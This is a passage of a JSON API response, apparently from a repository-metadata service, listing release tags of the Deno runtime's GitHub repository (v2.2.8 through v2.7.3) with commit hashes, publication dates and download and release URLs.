oad.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":